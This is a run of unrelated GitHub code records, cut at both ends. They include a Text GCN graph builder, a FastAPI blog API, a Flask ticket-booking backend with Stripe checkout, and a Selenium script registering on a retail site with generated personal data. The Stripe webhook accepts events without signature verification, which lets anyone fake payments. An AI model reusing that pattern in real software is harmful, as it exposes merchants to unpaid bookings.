word_pair_count[key]\n word_freq_i = word_window_freq[vocab[i]]\n word_freq_j = word_window_freq[vocab[j]]\n pmi = log((1.0 * count / num_window) /\n (1.0 * word_freq_i * word_freq_j/(num_window * num_window)))\n if pmi <= 0:\n continue\n row.append(train_size + i)\n col.append(train_size + j)\n weight.append(pmi)\n\n# word vector cosine similarity as weights\n\n'''\nfor i in range(vocab_size):\n for j in range(vocab_size):\n if vocab[i] in word_vector_map and vocab[j] in word_vector_map:\n vector_i = np.array(word_vector_map[vocab[i]])\n vector_j = np.array(word_vector_map[vocab[j]])\n similarity = 1.0 - cosine(vector_i, vector_j)\n if similarity > 0.9:\n print(vocab[i], vocab[j], similarity)\n row.append(train_size + i)\n col.append(train_size + j)\n weight.append(similarity)\n'''\n\n\n'''\n doc_word_freq: dict, key=\"str(doc_id) + ',' + str(word_id)\", 
\n# word vector cosine similarity as weights\n\n'''\nfor i in range(vocab_size):\n    for j in range(vocab_size):\n        if vocab[i] in word_vector_map and vocab[j] in word_vector_map:\n            vector_i = np.array(word_vector_map[vocab[i]])\n            vector_j = np.array(word_vector_map[vocab[j]])\n            similarity = 1.0 - cosine(vector_i, vector_j)\n            if similarity > 0.9:\n                print(vocab[i], vocab[j], similarity)\n                row.append(train_size + i)\n                col.append(train_size + j)\n                weight.append(similarity)\n'''\n\n\n'''\n    doc_word_freq: dict, key = \"str(doc_id) + ',' + str(word_id)\", value = the co-occurrence count of that\n    doc_id and word_id\n'''\n# doc word frequency\ndoc_word_freq = {}\nfor doc_id in range(len(shuffle_doc_words_list)):\n    doc_words = shuffle_doc_words_list[doc_id]\n    words = doc_words.split()\n    for word in words:\n        word_id = word_id_map[word]\n        doc_word_str = str(doc_id) + ',' + str(word_id)\n        if doc_word_str in doc_word_freq:\n            doc_word_freq[doc_word_str] += 1\n        else:\n            doc_word_freq[doc_word_str] = 1\n\n\n'''\n    Compute the word-document edge weights (TF-IDF)\n'''\nfor i in range(len(shuffle_doc_words_list)):\n    doc_words = shuffle_doc_words_list[i]\n    words = doc_words.split()\n    doc_word_set = set()\n    for word in words:\n        if word in doc_word_set:\n            continue\n        j = word_id_map[word]\n        key = str(i) + ',' + str(j)\n        freq = doc_word_freq[key]\n        if i < train_size: # training-set part\n            row.append(i)\n        else: # test-set part\n            row.append(i + vocab_size)\n        col.append(train_size + j)\n        idf = log(1.0 * len(shuffle_doc_words_list) / word_doc_freq[vocab[j]])\n        tf_idf = freq * idf\n        weight.append(tf_idf)\n        doc_word_set.add(word)\n\nnode_size = train_size + vocab_size + test_size\nadj = sp.csr_matrix((weight, (row, col)), shape=(node_size, node_size)) # adjacency matrix\n\n\n\n#***************************************************************************\n# 9. save the object: x,y,tx,ty,allx,ally,adj\n#***************************************************************************\n'''\n    dump objects\n'''\nf = open(\"data/ind.{}.x\".format(dataset), 'wb')\npkl.dump(x, f)\nf.close()\n\nf = open(\"data/ind.{}.y\".format(dataset), 'wb')\npkl.dump(y, f)\nf.close()\n\nf = open(\"data/ind.{}.tx\".format(dataset), 'wb')\npkl.dump(tx, f)\nf.close()\n\nf = open(\"data/ind.{}.ty\".format(dataset), 'wb')\npkl.dump(ty, f)\nf.close()\n\nf = open(\"data/ind.{}.allx\".format(dataset), 'wb')\npkl.dump(allx, f)\nf.close()\n\nf = open(\"data/ind.{}.ally\".format(dataset), 'wb')\npkl.dump(ally, f)\nf.close()\n\nf = open(\"data/ind.{}.adj\".format(dataset), 'wb')\npkl.dump(adj, f)\nf.close()\n","repo_name":"540117253/Code-Comments-of-Text_GCN","sub_path":"build_graph.py","file_name":"build_graph.py","file_ext":"py","file_size_in_byte":20683,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"}
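The record above ends by pickling x, y, tx, ty, allx, ally and adj. A minimal sketch of how such `ind.<dataset>.*` files are typically read back (hedged: `load_graph_inputs` is not part of the repo; it simply mirrors the dump calls above):

import pickle as pkl

def load_graph_inputs(dataset):
    objects = {}
    for name in ('x', 'y', 'tx', 'ty', 'allx', 'ally', 'adj'):
        with open('data/ind.{}.{}'.format(dataset, name), 'rb') as f:
            objects[name] = pkl.load(f)
    return objects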
{"seq_id":"10323107133","text":"from .. import models, schemas\nfrom sqlalchemy.orm import Session\nfrom fastapi import HTTPException, status\n\ndef get_all(db: Session):\n    blogs = db.query(models.Blog).all()\n    return blogs\n\ndef show(blog_id: int, db: Session):\n    blog = db.query(models.Blog).filter(models.Blog.id == blog_id).first()\n    if not blog:\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Item {blog_id} not found')\n    return {'msg': 'Response', 'code': 1, 'data': blog}\n\n\ndef create(request: schemas.Blog, db: Session):\n    new_blog = models.Blog(title=request.title, body=request.body, user_id=1)\n    db.add(new_blog)\n    db.commit()\n    db.refresh(new_blog)\n    return {'msg': 'Response', 'code': 1, 'data': new_blog}\n\ndef destroy(blog_id: int, db: Session):\n    blog = db.query(models.Blog).filter(models.Blog.id == blog_id)\n    if not blog.first():\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Item {blog_id} not found')\n    blog.delete(synchronize_session=False)\n    db.commit()\n    return {'msg': 'Response', 'code': 1}\n\ndef update(blog_id: int, request: schemas.Blog, db: Session):\n    blog = db.query(models.Blog).filter(models.Blog.id == blog_id)\n    if not blog.first():\n        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f'Item {blog_id} not found')\n    blog.update({'title': request.title, 'body': request.body})\n    db.commit()\n    return {'msg': 'Response', 'code': 1, 'data': request}\n\n","repo_name":"yudcoltran/fastapi-sqlalchemy-authen-autho","sub_path":"blog/repository/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"8747278235","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the traceDisease function below.\n# initialStates is an array of strings, each string a line of input. \n# Your return value should also be a list of strings (see the prompt for the expected output format)\n# Content sent to stdout (i.e. 
any print statements) will be sent to a separate output that is ignored by the test checker.\n\n# constants\nHEALTHY = \"HEALTHY\"\nSICK = \"SICK\"\nRECOVERING = \"RECOVERING\"\n\n# data structures\nperson_health = {}\nperson2idx = {}\nidx2person = {}\ncity2idx = {}\n\ndef preProcess(initialStates):\n    person_counter = 0\n    city_counter = 0\n\n    num_people = len(initialStates)\n    num_cities = 0\n    city_schedule = []\n\n    for i in range(num_people):\n        person_info = initialStates[i].split()\n        person = person_info[0]\n\n        person_health[person] = person_info[1] # read in\n        person2idx[person] = person_counter\n        idx2person[person_counter] = person\n\n        person_counter = person_counter + 1\n\n        this_person_schedule = []\n        for j in range(2, len(person_info)):\n            city = person_info[j]\n            this_person_schedule.append(city)\n            if city not in city2idx:\n                num_cities = num_cities + 1\n                city2idx[city] = city_counter\n\n                city_counter = city_counter + 1\n\n        city_schedule.append(this_person_schedule)\n\n    return num_people, num_cities, city_schedule, person2idx, idx2person, city2idx\n\ndef get_curr_city_idx(person, step_idx, city_schedule):\n    person_idx = person2idx[person]\n    max_travels = len(city_schedule[person_idx])\n    curr_loc_idx = step_idx % max_travels\n\n    curr_city_idx = city2idx[city_schedule[person_idx][curr_loc_idx]]\n\n    return curr_city_idx\n\ndef traceDisease(initialStates):\n    num_people, num_cities, city_schedule, person2idx, idx2person, city2idx = preProcess(initialStates)\n    output = \"\"\n    output_list = []\n    for i in range(num_people):\n        output = output + idx2person[i] + \" \"\n\n    output = output.rstrip()\n    output_list.append(output)\n\n    # processing step\n    for i in range(365): # max number of turns allowed\n        output = \"\"\n        cities_status = [0] * num_cities\n        people_status = [None] * num_people\n        healthy_people = set()\n\n        for person in person_health:\n            people_status[person2idx[person]] = person_health[person]\n            if person_health[person] == HEALTHY:\n                healthy_people.add(person)\n            else: # SICK or RECOVERING\n                if person_health[person] == SICK:\n                    person_health[person] = RECOVERING\n                elif person_health[person] == RECOVERING:\n                    person_health[person] = HEALTHY\n                \n                curr_city_idx = get_curr_city_idx(person, i, city_schedule)\n                cities_status[curr_city_idx] = 1 # infected!\n\n        for person in healthy_people:\n            curr_city_idx = get_curr_city_idx(person, i, city_schedule)\n            if cities_status[curr_city_idx] == 1:\n                person_health[person] = SICK\n\n        for j in range(num_people):\n            output = output + people_status[j] + \" \"\n\n        output = output.rstrip()\n        output_list.append(output)\n\n        # check if everyone is healthy\n        all_healthy = True\n        for j in range(num_people):\n            if people_status[j] != HEALTHY:\n                all_healthy = False\n                break\n\n        if all_healthy:\n            output_list.append(str(i + 1))\n            return output_list\n\n    output_list.append(str(365))\n    return output_list\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    initialStates_count = int(input())\n\n    initialStates = []\n\n    for _ in range(initialStates_count):\n        initialStates_item = input()\n        initialStates.append(initialStates_item)\n\n    res = traceDisease(initialStates)\n\n    fptr.write('\\n'.join(res))\n    fptr.write('\\n')\n\n    fptr.close()\n","repo_name":"pohjie/hackerrank","sub_path":"sick_travelers.py","file_name":"sick_travelers.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
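A hedged usage sketch for the `traceDisease` solver in the record above (the names, states and cities are invented; the expected input format is `name STATE city1 city2 ...`):

def _trace_disease_example():
    initial_states = [
        'alice SICK paris rome',
        'bob HEALTHY paris oslo',
    ]
    # returns one space-separated status row per simulated day, followed by
    # the day count on which everyone is HEALTHY (or 365 if that never happens)
    return traceDisease(initial_states)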
{"seq_id":"42534985573","text":"import unittest\nfrom Model import *\n\nclass FunctionCoverageTests(unittest.TestCase):\n\n    def setUp(self):\n        self.model = Model()\n\n    def tearDown(self):\n        print(\"next\")\n\n    def test_read_in_csv(self):\n        self.model.read_in_csv(\"testFileLoad.txt\")\n        self.expected = ['Hello This Is A Test', 'Hello This is Another Test']\n        self.actual = self.model.get_data_set()\n        self.assertTrue(self.expected == self.actual)\n\n    def test_wash_data(self):\n        self.model.read_in_csv(\"TestData.csv\")\n        self.model.wash_data()\n        self.expected = 7\n        self.actual = self.model.get_data_set_length()\n        print(self.model.get_data_set_length())\n        print(self.model.get_data_set())\n        self.assertTrue(self.expected == self.actual)\n\nif __name__ == \"__main__\":\n    unittest.main(verbosity=2)","repo_name":"jessicapelayo/BCPR301---Assignment-2","sub_path":"function_coverage_test.py","file_name":"function_coverage_test.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"37603661307","text":"import numpy as np\nimport pandas as pd\nimport static_info as stinfo\nimport read_lmp_data as rdlmp\nfrom colors_text import TextColor as bcolors\n\n\nclass Doc:\n    \"\"\"calculate roughness of the nanoparticles\n    Input: Read data: the DataFrames with Lammps format of Full atoms\n    format,\n    Output:\n        Root mean square roughness RMS or rq\n    \"\"\"\n\n\nclass Roughness:\n    \"\"\"get RMS\"\"\"\n    def __init__(self,\n                 np_data # Data of nanoparticles in LAMMPS format\n                 ) -> None:\n        self.__roughness(np_data)\n\n    def __roughness(self,\n                    np_data # Data of nanoparticles in LAMMPS format\n                    ) -> None:\n        \"\"\"Calculate the roughness by finding atoms on the shell\"\"\"\n        df: pd.DataFrame = self.__mk_rho(np_data.Atoms_df)\n        df = self.__select_atoms(df)\n        self.rms: float = self.__get_roughness(df)\n        self.__print_info()\n        del df\n\n    def __print_info(self) -> None:\n        \"\"\"print info on std\"\"\"\n        print(f'{bcolors.OKCYAN}{self.__class__.__name__}: '\n              f'({self.__module__})\\n'\n              f'\\tRoot mean square roughness for shell of size '\n              f'\"{stinfo.Constants.Shell_radius}\" is \"{self.rms:.3f}\"'\n              f'{bcolors.ENDC}')\n\n    def __get_roughness(self,\n                        df: pd.DataFrame # Atoms df with select atoms\n                        ) -> float:\n        \"\"\"calculate the roughness of the atoms inside the shell\"\"\"\n        rms: list[float] = list(df['rho']*df['rho'])\n        return np.sqrt(np.mean(rms))\n\n    def __select_atoms(self,\n                       df: pd.DataFrame # Select atoms inside the shell\n                       ) -> pd.DataFrame:\n        \"\"\"return atoms which are inside the shell\"\"\"\n        return df[df['rho'] >= 0]\n\n    def __mk_rho(self,\n                 Atoms_df: pd.DataFrame # Atoms info in Lammps format\n                 ) -> pd.DataFrame:\n        \"\"\"calculate and add rho column (distance from origin) of all\n        the atom\"\"\"\n        df: pd.DataFrame = Atoms_df.copy()\n        df['rho']: list[int] = [-1 for _ in df['atom_id']]\n        for item, row in Atoms_df.iterrows():\n            df.at[item, 'rho'] = self.__get_rho(row['x'], row['y'], row['z'])\n        df = self.__apply_shell(df)\n        return df\n\n    def __apply_shell(self,\n                      Atoms_df: pd.DataFrame # Atoms df with rho\n                      ) -> pd.DataFrame:\n        \"\"\"cut out the radius of the shell from rho to find atoms\n        inside the shell\"\"\"\n        inner_r: float # min of the shell (inner radius)\n        inner_r = np.max(Atoms_df['rho'] - stinfo.Constants.Shell_radius)\n        df: pd.DataFrame = Atoms_df.copy()\n        df['rho'] -= inner_r\n        return df\n\n    def __get_rho(self,\n                  x: float, # X component of the atoms\n                  y: float, # y component of the atoms\n                  z: float, # z component of the atoms\n                  ) -> float:\n        \"\"\"return the rho of the 
atom\"\"\"\n return np.sqrt(x*x + y*y + z*z)\n","repo_name":"saeed-amiri/np_silica","sub_path":"codes/roughness_rms.py","file_name":"roughness_rms.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36109530388","text":"import migrate\nimport sqlalchemy as sa\n\n\ndef handle_rid_index(meta, downgrade=False):\n if meta.bind.engine.name == 'sqlite':\n return\n\n resource = sa.Table('resource', meta, autoload=True)\n sample = sa.Table('sample', meta, autoload=True)\n params = {'columns': [sample.c.resource_id],\n 'refcolumns': [resource.c.id],\n 'name': 'fk_sample_resource_id'}\n if meta.bind.engine.name == 'mysql':\n # For mysql dialect all dependent FK should be removed\n # before index create/delete\n migrate.ForeignKeyConstraint(**params).drop()\n\n index = sa.Index('idx_sample_rid_cname', sample.c.resource_id,\n sample.c.counter_name)\n index.create() if downgrade else index.drop()\n\n if meta.bind.engine.name == 'mysql':\n migrate.ForeignKeyConstraint(**params).create()\n\n\ndef upgrade(migrate_engine):\n meta = sa.MetaData(bind=migrate_engine)\n meter = sa.Table(\n 'meter', meta,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('name', sa.String(255), nullable=False),\n sa.Column('type', sa.String(255)),\n sa.Column('unit', sa.String(255)),\n sa.UniqueConstraint('name', 'type', 'unit', name='def_unique'),\n mysql_engine='InnoDB',\n mysql_charset='utf8'\n )\n meter.create()\n sample = sa.Table('sample', meta, autoload=True)\n query = sa.select([sample.c.counter_name, sample.c.counter_type,\n sample.c.counter_unit]).distinct()\n for row in query.execute():\n meter.insert().values(name=row['counter_name'],\n type=row['counter_type'],\n unit=row['counter_unit']).execute()\n\n meter_id = sa.Column('meter_id', sa.Integer)\n meter_id.create(sample)\n params = {'columns': [sample.c.meter_id],\n 'refcolumns': [meter.c.id]}\n if migrate_engine.name == 'mysql':\n params['name'] = 'fk_sample_meter_id'\n if migrate_engine.name != 'sqlite':\n migrate.ForeignKeyConstraint(**params).create()\n\n index = sa.Index('ix_meter_name', meter.c.name)\n index.create(bind=migrate_engine)\n\n for row in sa.select([meter]).execute():\n (sample.update().\n where(sa.and_(sample.c.counter_name == row['name'],\n sample.c.counter_type == row['type'],\n sample.c.counter_unit == row['unit'])).\n values({sample.c.meter_id: row['id']}).execute())\n\n handle_rid_index(meta)\n\n sample.c.counter_name.drop()\n sample.c.counter_type.drop()\n sample.c.counter_unit.drop()\n sample.c.counter_volume.alter(name='volume')\n\n\ndef downgrade(migrate_engine):\n meta = sa.MetaData(bind=migrate_engine)\n sample = sa.Table('sample', meta, autoload=True)\n sample.c.volume.alter(name='counter_volume')\n sa.Column('counter_name', sa.String(255)).create(sample)\n sa.Column('counter_type', sa.String(255)).create(sample)\n sa.Column('counter_unit', sa.String(255)).create(sample)\n meter = sa.Table('meter', meta, autoload=True)\n for row in sa.select([meter]).execute():\n (sample.update().\n where(sample.c.meter_id == row['id']).\n values({sample.c.counter_name: row['name'],\n sample.c.counter_type: row['type'],\n sample.c.counter_unit: row['unit']}).execute())\n\n params = {'columns': [sample.c.meter_id],\n 'refcolumns': [meter.c.id]}\n if migrate_engine.name == 'mysql':\n params['name'] = 'fk_sample_meter_id'\n if migrate_engine.name != 'sqlite':\n migrate.ForeignKeyConstraint(**params).drop()\n\n handle_rid_index(meta, 
True)\n\n sample.c.meter_id.drop()\n meter.drop()\n","repo_name":"ChinaMassClouds/copenstack-server","sub_path":"openstack/src/ceilometer-2014.2.2/ceilometer/storage/sqlalchemy/migrate_repo/versions/031_add_new_meter_table.py","file_name":"031_add_new_meter_table.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"22047854074","text":"# -*- coding: utf-8 -*-\n# Author : Jin Kim\n# e-mail : jinkim@seculayer.co.kr\n# Powered by Seculayer © 2021 Service Model Team\n\n######################################################################################\n\nfrom xml.etree.ElementTree import ElementTree, parse, fromstring\n\n\nclass XMLUtils(object):\n @staticmethod\n def xml_load(**kwargs):\n xml_file_name = kwargs[\"filename\"]\n tree = parse(xml_file_name)\n\n return tree\n\n @staticmethod\n def xml_load_str(xml_str):\n tree = ElementTree(fromstring(xml_str))\n return tree\n\n @staticmethod\n def xml_write(**kwargs):\n xml_file_name = kwargs[\"filename\"]\n # indent\n\n ElementTree(kwargs[\"element\"]).write(\n xml_file_name, encoding=\"utf-8\", xml_declaration=True\n )\n\n @staticmethod\n def xml_parse(root, _key):\n if root is None:\n return None\n else:\n root_keys = root.findall(_key)\n return root_keys\n\n @staticmethod\n def indent(elem, level=0):\n i = \"\\n\" + level * \"\\t\"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \"\\t\"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n XMLUtils.indent(elem, level + 1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\n return elem\n\n @classmethod\n def xml2dict_list(cls, xml_data, keys):\n res_dict_list = list()\n for data in xml_data:\n res_dict_list.append(cls._xml2dict(xml_data=data, keys=keys))\n\n return res_dict_list\n\n @staticmethod\n def _xml2dict(xml_data, keys):\n res_dict = dict()\n for key in keys:\n try:\n res_dict[key] = xml_data.attrib[key]\n except :\n res_dict[key] = None\n return res_dict\n\n @staticmethod\n def find(xml_data, key):\n return xml_data.find(key).text\n\n\nif __name__ == '__main__':\n XMLUtils.xml_load(filename=\"./example.xml\")","repo_name":"seculayer/AutoAPE-dprs","sub_path":"dprs/common/utils/XMLUtils.py","file_name":"XMLUtils.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"43642687219","text":"import json\nfrom flask import Blueprint, request, jsonify, current_app\nfrom . import db, redis_client\nfrom .models import Show, Theatre, Booking\nimport uuid\nfrom werkzeug.utils import secure_filename\nimport os\nfrom datetime import datetime, date\nfrom sqlalchemy import or_\nfrom . 
import stripe\n\nshow_management = Blueprint('show_management', __name__)\n\n@show_management.route('/api/shows', methods=['GET'])\ndef get_all_shows():\n try:\n cached_data = redis_client.get('all_shows')\n if cached_data:\n return cached_data, 200\n\n shows = Show.query.all()\n show_data = []\n for show in shows:\n show_info = {\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats,\n 'theatre_name': show.theatre.name,\n 'theatre_place': show.theatre.place,\n }\n show_data.append(show_info)\n\n show_data_json = jsonify(show_data)\n redis_client.setex('all_shows', 10, show_data_json.data)\n\n return show_data_json, 200\n\n except Exception as e:\n return jsonify({'error': str(e)}), 500\n\n\n#Get all shows from a specific theatre\n@show_management.route('/api/shows/theatre/', methods=['GET'])\ndef get_shows_for_theatre(theatre_id):\n try:\n cached_data = redis_client.get(f'shows_for_theatre_{theatre_id}')\n if cached_data:\n return cached_data, 200\n\n theatre = Theatre.query.get(theatre_id)\n if not theatre:\n return jsonify({'message': 'Theatre with given ID does not exist.'}), 404\n\n shows = Show.query.filter_by(theatre_id=theatre_id).all()\n\n shows_data = []\n for show in shows:\n shows_data.append({\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats\n })\n\n shows_data_json = jsonify(shows_data)\n redis_client.setex(f'shows_for_theatre_{theatre_id}', 10, shows_data_json.data)\n\n return shows_data_json, 200\n\n except Exception as e:\n return jsonify({'error': str(e)}), 500\n\n\n# API to get a single show by ID\n@show_management.route('/api/shows/', methods=['GET'])\ndef get_show_by_id(show_id):\n cached_data = redis_client.get(f'show_{show_id}')\n if cached_data:\n return cached_data,200\n \n show = Show.query.get(show_id)\n if not show:\n return jsonify({'message': 'Show with given ID does not exist.'}), 404\n\n show_data = {\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats\n }\n show_data_json = jsonify(show_data)\n redis_client.setex(f'show_{show_id}', 10, show_data_json.data)\n\n return jsonify(show_data), 200\n\n\ndef saveImg(file, fileName):\n file.save(os.path.join(current_app.config['UPLOAD_FOLDER'], fileName))\n\n# API to create a new show\n@show_management.route('/api/shows', methods=['POST'])\ndef create_show():\n data = request.form\n name = data.get('name')\n rating = data.get('rating')\n tags = data.get('tags')\n ticket_price = data.get('ticket_price')\n start_time = datetime.strptime(data.get('start_time'), '%H:%M')\n end_time = datetime.strptime(data.get('end_time'), '%H:%M')\n date = datetime.strptime(data.get('date'), '%Y-%m-%d')\n user_id = data.get('user_id')\n trailer_url = data.get('trailer_url')\n posterImg = 
request.files.get('poster')\n\n theatre = Theatre.query.get(data.get('theatre_id'))\n if not theatre:\n return jsonify({'message': 'Theatre with given ID does not exist.'}), 404\n theatre_id = theatre.id\n available_seats = theatre.capacity\n\n if not name or not rating or not ticket_price or not theatre_id or not start_time or not end_time or not date or not user_id or not trailer_url or not posterImg:\n return jsonify({'message': 'Name, rating, ticket price, start time, end time, date, trailer url, poster, user id and theatre ID are required.'}), 400\n\n # Save the uploaded poster image to the server\n filename = str(uuid.uuid1()) + \"_\" + secure_filename(posterImg.filename)\n filepath = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)\n posterImg.save(filepath)\n\n new_show = Show(name=name, rating=rating, tags=tags, ticket_price=ticket_price, theatre_id=theatre_id, start_time=start_time,\n end_time=end_time, date=date, user_id=user_id, trailer_url=trailer_url, poster=filename, available_seats=available_seats)\n db.session.add(new_show)\n db.session.commit()\n\n return jsonify({'message': 'Show created successfully.', 'show_id': new_show.id}), 201\n\n# API to update an existing show\n@show_management.route('/api/shows/', methods=['PUT'])\ndef update_show(show_id):\n data = request.form\n name = data.get('name')\n rating = data.get('rating')\n tags = data.get('tags')\n ticket_price = data.get('ticket_price')\n theatre_id = data.get('theatre_id')\n start_time = datetime.strptime(data.get('start_time'), '%H:%M')\n end_time = datetime.strptime(data.get('end_time'), '%H:%M')\n date = datetime.strptime(data.get('date'), '%Y-%m-%d')\n user_id = data.get('user_id')\n trailer_url = data.get('trailer_url')\n posterImg = request.files.get('poster')\n\n if not name or not rating or not ticket_price or not theatre_id or not start_time or not end_time or not date or not user_id or not trailer_url:\n return jsonify({'message': 'Name, rating, ticket price, start time, end time, date, trailer url, poster, user id and theatre ID are required.'}), 400\n\n show = Show.query.get(show_id)\n if not show:\n return jsonify({'message': 'Show with given ID does not exist.'}), 404\n\n if not Theatre.query.filter_by(id=theatre_id).first():\n return jsonify({'message': 'Theatre with given ID does not exist.'}), 404\n \n if posterImg:\n filename = str(uuid.uuid1()) + \"_\" + secure_filename(posterImg.filename)\n filepath = os.path.join(current_app.config['UPLOAD_FOLDER'], filename)\n posterImg.save(filepath)\n show.poster = filename\n\n show.name = name\n show.rating = rating\n show.tags = tags\n show.ticket_price = ticket_price\n show.theatre_id = theatre_id\n show.start_time = start_time\n show.end_time = end_time\n show.date = date\n show.user_id = user_id\n show.trailer_url = trailer_url\n db.session.commit()\n\n return jsonify({'message': 'Show updated successfully.'}), 200\n\n# API to delete a show\n@show_management.route('/api/shows/', methods=['DELETE'])\ndef delete_show(show_id):\n show = Show.query.get(show_id)\n if not show:\n return jsonify({'message': 'Show with given ID does not exist.'}), 404\n\n bookings = Booking.query.filter_by(show_id=show_id).all()\n\n for booking in bookings:\n db.session.delete(booking)\n\n db.session.delete(show)\n db.session.commit()\n\n return jsonify({'message': 'Show deleted successfully.'}), 200\n\n# API to search shows based on a single query parameter\n@show_management.route('/api/shows/search', methods=['GET'])\ndef search_shows():\n cached_data = 
redis_client.get('search_results')\n if cached_data:\n return cached_data,200\n\n # Get the search query from query parameters\n search_query = request.args.get('q')\n\n # Perform a database query to filter shows based on the search query\n shows = Show.query.filter(\n or_(\n Show.name.ilike(f'%{search_query}%'),\n Show.tags.ilike(f'%{search_query}%'),\n Show.theatre.has(Theatre.name.ilike(f'%{search_query}%')),\n Show.theatre.has(Theatre.place.ilike(f'%{search_query}%')),\n )\n ).all()\n\n shows_data = []\n for show in shows:\n shows_data.append({\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats\n })\n\n search_results_json = jsonify(shows_data)\n redis_client.setex('search_results',10,search_results_json.data)\n\n return jsonify(shows_data), 200\n\n\n@show_management.route(\"/api/checkout\", methods=[\"POST\"])\ndef stripeCheckout():\n data = request.get_json()\n user_id = data.get('user_id')\n show_name = data.get('show_name')\n ticket_price = str(round(data.get('ticket_price')*100,2))\n num_tickets = data.get('num_tickets')\n show_id = data.get('show_id')\n\n \n session = stripe.checkout.Session.create(\n payment_method_types=['card'],\n line_items=[{\n 'price_data': {\n 'unit_amount_decimal': ticket_price,\n 'currency': 'usd',\n 'product_data': {\n 'name': show_name\n },\n },\n 'quantity': num_tickets,\n },\n ],\n mode='payment',\n success_url='http://localhost:8080/booking-success',\n cancel_url='http://localhost:8080/booking-failed',\n metadata={\n 'user_id':user_id,\n 'show_name':show_name,\n 'ticket_price':ticket_price,\n 'num_tickets':num_tickets,\n 'show_id':show_id\n }\n )\n return jsonify({\"sessionId\":session['id'],\"metadata\":session.metadata}),200\n\n# Endpoint to handle Stripe webhook events\n@show_management.route(\"/api/webhooks/stripe\", methods=[\"POST\"])\ndef handle_stripe_webhook():\n payload = request.data\n event = None\n\n try:\n event = stripe.Event.construct_from(\n json.loads(payload), stripe.api_key\n )\n except ValueError as e:\n return jsonify({\"error\": \"Invalid payload\"}), 400\n\n if event.type == \"checkout.session.completed\":\n # A payment has been successfully completed\n session = event.data.object\n user_id = int(session.metadata.get(\"user_id\"))\n show_id = int(session.metadata.get(\"show_id\"))\n num_tickets = int(session.metadata.get(\"num_tickets\"))\n\n # Create the booking and update available_tickets\n create_and_update_booking(user_id, show_id, num_tickets)\n\n return jsonify({\"status\": \"success\"}), 200\n\ndef create_and_update_booking(user_id, show_id, num_tickets):\n try:\n booking = Booking(user_id=user_id, show_id=show_id, num_tickets=num_tickets, date_of_booking=date.today())\n db.session.add(booking)\n\n show = Show.query.get(show_id)\n show.available_seats -= num_tickets\n\n db.session.commit()\n\n except Exception as e:\n db.session.rollback()","repo_name":"suyamoonpathak/ShowScape---A-Ticket-Management-Vue-Flask-App","sub_path":"backend/show_management.py","file_name":"show_management.py","file_ext":"py","file_size_in_byte":11913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40273298002","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import 
ChromeDriverManager\nfrom data.personal import CreatePerson\nfrom selenium.webdriver.common.by import By\nimport time\nfrom bs4 import BeautifulSoup\n\n\n\n\n\nclass XKom:\n    \"\"\"It took me a long time to find a site where some kind of login (with 'registration') can be done without problems\"\"\"\n\n    def __init__(self, email_instance_user):\n        self.email_instance_user = email_instance_user\n\n    def all_in_class(self):\n        XKom.register(self)\n        time.sleep(10)\n        XKom.add_to_cart(self)\n        XKom.fill_data_in_cart(self)\n\n    def start_convert(self):\n        global browser\n        browser = webdriver.Chrome(ChromeDriverManager().install())\n        browser.implicitly_wait(10)\n        browser.get(\"https://www.x-kom.pl\")\n        browser.maximize_window()\n        time.sleep(4)\n        # browser.find_element(By.XPATH, \"//div[@id='react-portals']/div[4]/div/div[@role='dialog']//button[.='W \"\n        #                      \"porządku']\").click()\n        browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//div[@role='dialog']//button[.='W porządku']\").click()\n        time.sleep(2)\n        XKom.conversation(self)\n\n    def 